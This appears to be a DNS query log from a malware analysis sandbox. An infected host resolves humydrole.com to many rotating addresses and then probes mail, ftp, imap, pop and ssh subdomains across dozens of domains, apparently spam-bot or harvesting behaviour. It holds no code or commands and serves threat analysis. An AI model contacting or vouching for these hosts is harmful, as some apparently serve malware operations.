Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.132	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		167.61.223.188	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928035021 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		211.181.24.132	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		210.182.29.70	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		167.61.223.188	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:06.928046942 CET	1.1.1.1	192.168.2.4	0xceba	No error (0)	humydrole.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.692714930 CET	1.1.1.1	192.168.2.4	0x1fd8	No error (0)	mail.96l.com		15.197.204.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:07.692714930 CET	1.1.1.1	192.168.2.4	0x1fd8	No error (0)	mail.96l.com		3.33.243.145	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.062880039 CET	1.1.1.1	192.168.2.4	0xf232	No error (0)	mail.noweco.com	noweco.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:08.062880039 CET	1.1.1.1	192.168.2.4	0xf232	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.070471048 CET	1.1.1.1	192.168.2.4	0xf232	No error (0)	mail.noweco.com	noweco.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:08.070471048 CET	1.1.1.1	192.168.2.4	0xf232	No error (0)	noweco.com		216.37.42.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.294405937 CET	1.1.1.1	192.168.2.4	0x1faf	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.294459105 CET	1.1.1.1	192.168.2.4	0x1faf	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:08.666379929 CET	1.1.1.1	192.168.2.4	0x9b91	Name error (3)	mail.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.031420946 CET	1.1.1.1	192.168.2.4	0xe910	Name error (3)	imap.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.245260000 CET	1.1.1.1	192.168.2.4	0xe910	Name error (3)	imap.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.697976112 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	mail.il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:09.697976112 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.698046923 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	mail.il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:09.698046923 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:09.698136091 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	mail.il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:09.698136091 CET	1.1.1.1	192.168.2.4	0xe26c	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.519660950 CET	1.1.1.1	192.168.2.4	0x5d5f	Name error (3)	pop.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.859577894 CET	1.1.1.1	192.168.2.4	0x563	Name error (3)	pop3.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.895984888 CET	1.1.1.1	192.168.2.4	0xbbad	Name error (3)	mailgate.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:10.896024942 CET	1.1.1.1	192.168.2.4	0xbbad	Name error (3)	mailgate.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.175745010 CET	1.1.1.1	192.168.2.4	0x493b	Name error (3)	mailgate.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.267096043 CET	1.1.1.1	192.168.2.4	0xf222	No error (0)	mail.ct.ated.net		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.267096043 CET	1.1.1.1	192.168.2.4	0xf222	No error (0)	mail.ct.ated.net		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.576711893 CET	1.1.1.1	192.168.2.4	0xd3c6	Name error (3)	relay.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.651248932 CET	1.1.1.1	192.168.2.4	0xe33e	Name error (3)	relay.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.651259899 CET	1.1.1.1	192.168.2.4	0xe33e	Name error (3)	relay.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.661452055 CET	1.1.1.1	192.168.2.4	0x1a68	Name error (3)	bnder.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.696815968 CET	1.1.1.1	192.168.2.4	0x8e6c	Name error (3)	bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.797210932 CET	1.1.1.1	192.168.2.4	0x53e5	No error (0)	um.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.797277927 CET	1.1.1.1	192.168.2.4	0x53e5	No error (0)	um.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:11.931859016 CET	1.1.1.1	192.168.2.4	0x6527	No error (0)	um.cz		88.86.105.95	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.931865931 CET	1.1.1.1	192.168.2.4	0x6527	No error (0)	um.cz		88.86.105.95	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:11.975215912 CET	1.1.1.1	192.168.2.4	0xef3e	Name error (3)	mail.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.010555029 CET	1.1.1.1	192.168.2.4	0xbc8e	Name error (3)	ssh.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.020674944 CET	1.1.1.1	192.168.2.4	0x999d	Name error (3)	ftp.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.074604034 CET	1.1.1.1	192.168.2.4	0x48fe	No error (0)	vip-mail.superhosting.cz		95.168.196.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.227912903 CET	1.1.1.1	192.168.2.4	0x48fe	No error (0)	vip-mail.superhosting.cz		95.168.196.56	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.280159950 CET	1.1.1.1	192.168.2.4	0x628d	Name error (3)	imap.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.315207005 CET	1.1.1.1	192.168.2.4	0x4dc2	Name error (3)	pop.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.434721947 CET	1.1.1.1	192.168.2.4	0x167e	Name error (3)	smtp.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.693388939 CET	1.1.1.1	192.168.2.4	0x9dad	Name error (3)	pop3.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:12.736263990 CET	1.1.1.1	192.168.2.4	0x59dc	Name error (3)	mailgate.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:13.218885899 CET	1.1.1.1	192.168.2.4	0xe52f	Name error (3)	relay.bnder.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.693968058 CET	1.1.1.1	192.168.2.4	0xbb7	Name error (3)	ftp.nrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.794769049 CET	1.1.1.1	192.168.2.4	0x40fe	Name error (3)	ftp.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.878314972 CET	1.1.1.1	192.168.2.4	0x40fe	Name error (3)	ftp.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.924890995 CET	1.1.1.1	192.168.2.4	0x95b5	Name error (3)	ftp.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.001787901 CET	1.1.1.1	192.168.2.4	0x37c5	No error (0)	ftp.ia.eu		199.59.243.225	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.082395077 CET	1.1.1.1	192.168.2.4	0x9eb6	No error (0)	ftp.1.tv		15.197.172.60	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.137536049 CET	1.1.1.1	192.168.2.4	0x734e	No error (0)	ftp.gcann.cr.co.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.140592098 CET	1.1.1.1	192.168.2.4	0x71ae	Name error (3)	minstugml.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:15.160731077 CET	1.1.1.1	192.168.2.4	0xf678	No error (0)	ftp.cm.cz		104.247.82.52	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.249746084 CET	1.1.1.1	192.168.2.4	0xf678	No error (0)	ftp.cm.cz		104.247.82.52	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.250799894 CET	1.1.1.1	192.168.2.4	0x50b7	Name error (3)	minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.297816038 CET	1.1.1.1	192.168.2.4	0x7b1b	No error (0)	ftp.gmo.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.343797922 CET	1.1.1.1	192.168.2.4	0xd630	No error (0)	ftp.san.ee		145.14.30.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.343815088 CET	1.1.1.1	192.168.2.4	0xd630	No error (0)	ftp.san.ee		145.14.30.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.465665102 CET	1.1.1.1	192.168.2.4	0x9106	No error (0)	ftp.gr.2mail.com		192.99.158.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.480151892 CET	1.1.1.1	192.168.2.4	0xf36b	No error (0)	ftp.gbya.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.502043962 CET	1.1.1.1	192.168.2.4	0x7b2e	Name error (3)	ftp.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.536683083 CET	1.1.1.1	192.168.2.4	0x1cb8	No error (0)	ftp.onlist.com		192.99.158.243	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.636116028 CET	1.1.1.1	192.168.2.4	0x82a3	Name error (3)	mail.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.641968012 CET	1.1.1.1	192.168.2.4	0x626f	No error (0)	mail.ia.eu		199.59.243.225	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.642975092 CET	1.1.1.1	192.168.2.4	0x626f	No error (0)	mail.ia.eu		199.59.243.225	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.664761066 CET	1.1.1.1	192.168.2.4	0xf7f5	Name error (3)	ssh.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.669533968 CET	1.1.1.1	192.168.2.4	0xe2e	No error (0)	ftp.apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.682984114 CET	1.1.1.1	192.168.2.4	0xe2e	No error (0)	ftp.apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.725389957 CET	1.1.1.1	192.168.2.4	0x37ca	Name error (3)	ftp.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.757086039 CET	1.1.1.1	192.168.2.4	0x6fea	Name error (3)	mail.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.772922039 CET	1.1.1.1	192.168.2.4	0xd5cd	Name error (3)	ftp.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.773072958 CET	1.1.1.1	192.168.2.4	0xd5cd	Name error (3)	ftp.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.871761084 CET	1.1.1.1	192.168.2.4	0x37ca	Name error (3)	ftp.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.882132053 CET	1.1.1.1	192.168.2.4	0x982f	No error (0)	mail.gcann.cr.co.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.921140909 CET	1.1.1.1	192.168.2.4	0x8b13	Name error (3)	imap.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.969157934 CET	1.1.1.1	192.168.2.4	0x982f	No error (0)	mail.gcann.cr.co.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.973697901 CET	1.1.1.1	192.168.2.4	0x3fc4	Name error (3)	pop.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.021723032 CET	1.1.1.1	192.168.2.4	0xa800	Name error (3)	mail.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.021852016 CET	1.1.1.1	192.168.2.4	0xa800	Name error (3)	mail.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.038630962 CET	1.1.1.1	192.168.2.4	0xeab1	No error (0)	ftp.il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:16.038630962 CET	1.1.1.1	192.168.2.4	0xeab1	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.038645983 CET	1.1.1.1	192.168.2.4	0xeab1	No error (0)	ftp.il.cm	i.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:16.038645983 CET	1.1.1.1	192.168.2.4	0xeab1	No error (0)	i.17986.net		67.21.93.254	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.119636059 CET	1.1.1.1	192.168.2.4	0xf2aa	Name error (3)	pop.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.139276028 CET	1.1.1.1	192.168.2.4	0x560e	Name error (3)	smtp.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.190062046 CET	1.1.1.1	192.168.2.4	0xed7a	Name error (3)	mailgate.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.242358923 CET	1.1.1.1	192.168.2.4	0x24f7	Name error (3)	pop3.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.250163078 CET	1.1.1.1	192.168.2.4	0xf2aa	Name error (3)	pop.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.483238935 CET	1.1.1.1	192.168.2.4	0x165b	Name error (3)	relay.minstugml.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.513856888 CET	1.1.1.1	192.168.2.4	0xe0a5	Name error (3)	cjmjizaloltmm.ch	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:16.535805941 CET	1.1.1.1	192.168.2.4	0xea54	Name error (3)	pop3.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.593065977 CET	1.1.1.1	192.168.2.4	0x886d	Name error (3)	pop.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.593113899 CET	1.1.1.1	192.168.2.4	0x886d	Name error (3)	pop.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.612683058 CET	1.1.1.1	192.168.2.4	0xea54	Name error (3)	pop3.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.618769884 CET	1.1.1.1	192.168.2.4	0xaa9f	No error (0)	aspmx3.googlemail.com		64.233.184.26	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.643482924 CET	1.1.1.1	192.168.2.4	0x5f3e	Name error (3)	cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.690999985 CET	1.1.1.1	192.168.2.4	0x2b1c	No error (0)	mail.gbya.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.802242994 CET	1.1.1.1	192.168.2.4	0x5f3e	Name error (3)	cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.956814051 CET	1.1.1.1	192.168.2.4	0x7559	Name error (3)	ftp.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.978991032 CET	1.1.1.1	192.168.2.4	0x1c9c	Name error (3)	mail.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.014317036 CET	1.1.1.1	192.168.2.4	0x1e8e	Name error (3)	ssh.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.048304081 CET	1.1.1.1	192.168.2.4	0x5deb	Name error (3)	pop3.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.112863064 CET	1.1.1.1	192.168.2.4	0x5deb	Name error (3)	pop3.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.305674076 CET	1.1.1.1	192.168.2.4	0x477c	Name error (3)	pop.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.308712959 CET	1.1.1.1	192.168.2.4	0xb08b	Name error (3)	igarraail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.321517944 CET	1.1.1.1	192.168.2.4	0x99c3	Name error (3)	mailgate.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.321568012 CET	1.1.1.1	192.168.2.4	0x99c3	Name error (3)	mailgate.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.393562078 CET	1.1.1.1	192.168.2.4	0x516d	Name error (3)	il.comuk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.409348965 CET	1.1.1.1	192.168.2.4	0x105e	Name error (3)	imap.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.414174080 CET	1.1.1.1	192.168.2.4	0xab9f	No error (0)	mailgate.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.414191961 CET	1.1.1.1	192.168.2.4	0xab9f	No error (0)	mailgate.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.417227030 CET	1.1.1.1	192.168.2.4	0xe64c	Name error (3)	igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.481410980 CET	1.1.1.1	192.168.2.4	0x1bf7	Name error (3)	il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.505419016 CET	1.1.1.1	192.168.2.4	0x9c82	Name error (3)	y.itm98jca.dycandy11221000lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.647205114 CET	1.1.1.1	192.168.2.4	0x366a	Name error (3)	y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.760474920 CET	1.1.1.1	192.168.2.4	0x183f	Name error (3)	mailgate.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.760488033 CET	1.1.1.1	192.168.2.4	0x183f	Name error (3)	mailgate.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.783509970 CET	1.1.1.1	192.168.2.4	0xd24a	Name error (3)	relay.hna.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.835549116 CET	1.1.1.1	192.168.2.4	0xda59	Name error (3)	pop3.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.853494883 CET	1.1.1.1	192.168.2.4	0x17d9	Name error (3)	ftp.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.862237930 CET	1.1.1.1	192.168.2.4	0x361b	Name error (3)	ftp.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.867291927 CET	1.1.1.1	192.168.2.4	0x62e4	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.867299080 CET	1.1.1.1	192.168.2.4	0x62e4	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.883784056 CET	1.1.1.1	192.168.2.4	0xa0c2	Name error (3)	mail.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.911166906 CET	1.1.1.1	192.168.2.4	0x1eb2	Name error (3)	smtp.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.919367075 CET	1.1.1.1	192.168.2.4	0x9220	Name error (3)	ssh.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.925152063 CET	1.1.1.1	192.168.2.4	0xc05c	Name error (3)	mail.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.955048084 CET	1.1.1.1	192.168.2.4	0xe754	Name error (3)	ssh.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.959692955 CET	1.1.1.1	192.168.2.4	0xf751	Name error (3)	hieta.g12a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.959775925 CET	1.1.1.1	192.168.2.4	0xf751	Name error (3)	hieta.g12a.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.982335091 CET	1.1.1.1	192.168.2.4	0x810	No error (0)	mail.gmo.uk		3.64.163.50	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.988495111 CET	1.1.1.1	192.168.2.4	0xae6b	Name error (3)	mailgate.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.027998924 CET	1.1.1.1	192.168.2.4	0x4bb1	Name error (3)	mail.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.029222012 CET	1.1.1.1	192.168.2.4	0x6dfb	No error (0)	alt1.gmr-smtp-in.l.google.com		209.85.202.14	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.033885956 CET	1.1.1.1	192.168.2.4	0x8fa8	Name error (3)	ssh.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.063714981 CET	1.1.1.1	192.168.2.4	0x8da0	Name error (3)	hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.063734055 CET	1.1.1.1	192.168.2.4	0x8da0	Name error (3)	hieta.g12a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.088367939 CET	1.1.1.1	192.168.2.4	0x6f9c	Name error (3)	ftp.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.150187016 CET	1.1.1.1	192.168.2.4	0xb393	Name error (3)	pop.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.190712929 CET	1.1.1.1	192.168.2.4	0xfcf2	Name error (3)	imap.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.217597961 CET	1.1.1.1	192.168.2.4	0xa76c	Name error (3)	relay.cjmjizaloltmm.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.218877077 CET	1.1.1.1	192.168.2.4	0x1cae	Name error (3)	imap.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.226677895 CET	1.1.1.1	192.168.2.4	0x17e6	Name error (3)	pop.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.239706993 CET	1.1.1.1	192.168.2.4	0xb9a6	Name error (3)	pop.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.382576942 CET	1.1.1.1	192.168.2.4	0xe62f	Name error (3)	pop3.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.401482105 CET	1.1.1.1	192.168.2.4	0x3d89	Name error (3)	relay.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.401500940 CET	1.1.1.1	192.168.2.4	0x3d89	Name error (3)	relay.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.438747883 CET	1.1.1.1	192.168.2.4	0xf471	Name error (3)	smtp.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.442588091 CET	1.1.1.1	192.168.2.4	0xe4a6	Name error (3)	pop.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.458385944 CET	1.1.1.1	192.168.2.4	0x189a	Name error (3)	smtp.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.464037895 CET	1.1.1.1	192.168.2.4	0x33a9	Name error (3)	imap.y.itm98jca.dycandy11221000lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.490900040 CET	1.1.1.1	192.168.2.4	0x43af	Name error (3)	mailgate.il.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.499735117 CET	1.1.1.1	192.168.2.4	0x76aa	Name error (3)	pop3.igarraail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.562829971 CET	1.1.1.1	192.168.2.4	0x7084	Name error (3)	imap.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.562870979 CET	1.1.1.1	192.168.2.4	0x7084	Name error (3)	imap.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.624113083 CET	1.1.1.1	192.168.2.4	0x1098	Name error (3)	pop3.gco.uk	none	none	A (IP address)	IN (0x0001)	false
